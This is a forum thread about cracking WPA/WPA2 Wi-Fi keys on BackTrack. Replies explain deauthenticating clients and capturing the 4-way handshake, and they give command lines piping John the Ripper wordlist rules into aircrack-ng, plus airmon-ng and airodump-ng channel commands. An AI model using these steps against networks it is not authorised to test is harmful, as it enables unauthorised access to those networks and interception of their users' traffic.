Sign in to follow this  
Followers 0
aperfectcircle1

Cracking and Sniffing WPA/WPA2 BT4

13 posts in this topic

hi o.o I was wondering how I might crack a WPA/WPA2 network and sniff traffic. I've heard putting your card in promiscuous and sniffing doesnt work due to client key. From what I establish I deauth a station with aireplay, capture the 4 way handshake to get the one of the keys. Im still unclear as for what I need to do afterwards to my airodump-ng file o.o to get the other O.O and what I need to do to sniff the traffic

Edited by aperfectcircle1
0

Share this post


Link to post
Share on other sites

With the 4-way handshake you have all the information to perform a dictionary attack. The best tool I've used for this is pryit (fastest speeeds, network support and can use a compatible graphics card). Aircrack-ng is also good but coWPAtty is by far the slowest although works well for pre-computed tables.

The theory in a nutshell:

During the handshake two random values (one from the AP the other from the client) are used with the ESSID, key and MAC address of client and AP to generate a MIC (Message Integrity Check) which is appended to the packets. With the handshake an attacker has access to everything except the key so we try possible keys comparing the MIC each time. If we find a MIC that matches then we have the right key. Due to the algorithm used this can be a very slow processes.

The actual process is a little more complicated. The handshake is actually used to create temporal keys, group keys etc but the above is essentially correct.

1

Share this post


Link to post
Share on other sites

With the 4-way handshake you have all the information to perform a dictionary attack. The best tool I've used for this is pryit (fastest speeeds, network support and can use a compatible graphics card). Aircrack-ng is also good but coWPAtty is by far the slowest although works well for pre-computed tables.

The theory in a nutshell:

During the handshake two random values (one from the AP the other from the client) are used with the ESSID, key and MAC address of client and AP to generate a MIC (Message Integrity Check) which is appended to the packets. With the handshake an attacker has access to everything except the key so we try possible keys comparing the MIC each time. If we find a MIC that matches then we have the right key. Due to the algorithm used this can be a very slow processes.

The actual process is a little more complicated. The handshake is actually used to create temporal keys, group keys etc but the above is essentially correct.

where do you get wordlists that have passwords like y1231u312y31gu312g :S... O.O pryit is good :o??? I have nvidia geforce 6800 O.o and couldnt get the drivers to work with linux :( but maybe i'll try again :o

0

Share this post


Link to post
Share on other sites

With the 4-way handshake you have all the information to perform a dictionary attack. The best tool I've used for this is pryit (fastest speeeds, network support and can use a compatible graphics card). Aircrack-ng is also good but coWPAtty is by far the slowest although works well for pre-computed tables.

The theory in a nutshell:

During the handshake two random values (one from the AP the other from the client) are used with the ESSID, key and MAC address of client and AP to generate a MIC (Message Integrity Check) which is appended to the packets. With the handshake an attacker has access to everything except the key so we try possible keys comparing the MIC each time. If we find a MIC that matches then we have the right key. Due to the algorithm used this can be a very slow processes.

The actual process is a little more complicated. The handshake is actually used to create temporal keys, group keys etc but the above is essentially correct.

where do you get wordlists that have passwords like y1231u312y31gu312g :S... O.O pryit is good :o??? I have nvidia geforce 6800 O.o and couldnt get the drivers to work with linux :( but maybe i'll try again :o

Getting decent wordlists is difficult and luckily Backtrack provides a good WPA list. It's pretty large and needs to be installed from the repositories but can also be downloaded and extracted manually. I tried looking for the link but cant seem to find it at the moment.

You can find more lists by searching but it takes a while when you first start out :tongue:

Some bad news: I dont think that your card is supported. If you can get a newer card you'll definitely see some improvements.

0

Share this post


Link to post
Share on other sites

With the 4-way handshake you have all the information to perform a dictionary attack. The best tool I've used for this is pryit (fastest speeeds, network support and can use a compatible graphics card). Aircrack-ng is also good but coWPAtty is by far the slowest although works well for pre-computed tables.

The theory in a nutshell:

During the handshake two random values (one from the AP the other from the client) are used with the ESSID, key and MAC address of client and AP to generate a MIC (Message Integrity Check) which is appended to the packets. With the handshake an attacker has access to everything except the key so we try possible keys comparing the MIC each time. If we find a MIC that matches then we have the right key. Due to the algorithm used this can be a very slow processes.

The actual process is a little more complicated. The handshake is actually used to create temporal keys, group keys etc but the above is essentially correct.

where do you get wordlists that have passwords like y1231u312y31gu312g :S... O.O pryit is good :o??? I have nvidia geforce 6800 O.o and couldnt get the drivers to work with linux :( but maybe i'll try again :o

Getting decent wordlists is difficult and luckily Backtrack provides a good WPA list. It's pretty large and needs to be installed from the repositories but can also be downloaded and extracted manually. I tried looking for the link but cant seem to find it at the moment.

You can find more lists by searching but it takes a while when you first start out :tongue:

Some bad news: I dont think that your card is supported. If you can get a newer card you'll definitely see some improvements.

where is this list! :o

0

Share this post


Link to post
Share on other sites

I've never tried the precomputed wordlists, but usually just use jtr rules. Send them to stdout using the --stdout switch and use the "-" character in cowpatty to define the wordlist. Of course this isn't a sure way to crack WPA.

0

Share this post


Link to post
Share on other sites

I've never tried the precomputed wordlists, but usually just use jtr rules. Send them to stdout using the --stdout switch and use the "-" character in cowpatty to define the wordlist. Of course this isn't a sure way to crack WPA.

isnt cowpatty the slowest :S? anyone got a link to a good WPA wordlist O.O for aircrack or pyrit o.o?

0

Share this post


Link to post
Share on other sites

I've never tried the precomputed wordlists, but usually just use jtr rules. Send them to stdout using the --stdout switch and use the "-" character in cowpatty to define the wordlist. Of course this isn't a sure way to crack WPA.

isnt cowpatty the slowest :S? anyone got a link to a good WPA wordlist O.O for aircrack or pyrit o.o?

then just use: ./john --wordlist=password_list --rules --stdout | aircrack-ng -e ssid -w - capture_file

Here are some wordlists. To make them go quicker for WPA, use something like: ./john --wordlist=password_list --rules --stdout | egrep "^.{8,63}" | unique | aircrack-ng -e ssid -w - capture_file. That should filter all words that are not at least 8 chars or more than 63.

Edited by tekio
1

Share this post


Link to post
Share on other sites

thx guys! also for WPA handshake, sometimes im unable to capture it after deauthing a station, what could I do to fix this? I've heard things like setting your speed to be the same as the ap or station.. so what does that mean if the ap and station both have 54e-54e by them!? :o and iwlist doesnt show modulation modes for me :S so how do I set my modulation or mode to the same as the ap? and how to I determine the mode of the ap :S ty!

0

Share this post


Link to post
Share on other sites

thx guys! also for WPA handshake, sometimes im unable to capture it after deauthing a station, what could I do to fix this? I've heard things like setting your speed to be the same as the ap or station.. so what does that mean if the ap and station both have 54e-54e by them!? :o and iwlist doesnt show modulation modes for me :S so how do I set my modulation or mode to the same as the ap? and how to I determine the mode of the ap :S ty!

Capturing the handshake can be tricky sometimes. What application are you using to capture? I assume airodump-ng. Before worrying too much about the more complicated stuff I would make sure that you're listening on the correct channel. It is also important that you are not too far or too near the access point and client.

If you open the capture file in wireshark and filter for "eapol" you should see any handshake packets you've received which may give you a clue as to what went wrong.

0

Share this post


Link to post
Share on other sites

thx guys! also for WPA handshake, sometimes im unable to capture it after deauthing a station, what could I do to fix this? I've heard things like setting your speed to be the same as the ap or station.. so what does that mean if the ap and station both have 54e-54e by them!? :o and iwlist doesnt show modulation modes for me :S so how do I set my modulation or mode to the same as the ap? and how to I determine the mode of the ap :S ty!

Capturing the handshake can be tricky sometimes. What application are you using to capture? I assume airodump-ng. Before worrying too much about the more complicated stuff I would make sure that you're listening on the correct channel. It is also important that you are not too far or too near the access point and client.

If you open the capture file in wireshark and filter for "eapol" you should see any handshake packets you've received which may give you a clue as to what went wrong.

yup using airodump-ng :o do I need to configure tx-power, freq? for some reason my card wont go above 27 :S

0

Share this post


Link to post
Share on other sites

thx guys! also for WPA handshake, sometimes im unable to capture it after deauthing a station, what could I do to fix this? I've heard things like setting your speed to be the same as the ap or station.. so what does that mean if the ap and station both have 54e-54e by them!? :o and iwlist doesnt show modulation modes for me :S so how do I set my modulation or mode to the same as the ap? and how to I determine the mode of the ap :S ty!

Capturing the handshake can be tricky sometimes. What application are you using to capture? I assume airodump-ng. Before worrying too much about the more complicated stuff I would make sure that you're listening on the correct channel. It is also important that you are not too far or too near the access point and client.

If you open the capture file in wireshark and filter for "eapol" you should see any handshake packets you've received which may give you a clue as to what went wrong.

yup using airodump-ng :o do I need to configure tx-power, freq? for some reason my card wont go above 27 :S

You probably wont have to change the power (which I dont think is supported by all cards anyway) but you will need to make sure you are listening on the right channel (frequency). This can be done when you put your card into monitor mode with

airmon-ng start <interface> <channel>

or by selecting a channel with

airodump-ng -c <channel> <interface>

0

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now
Sign in to follow this  
Followers 0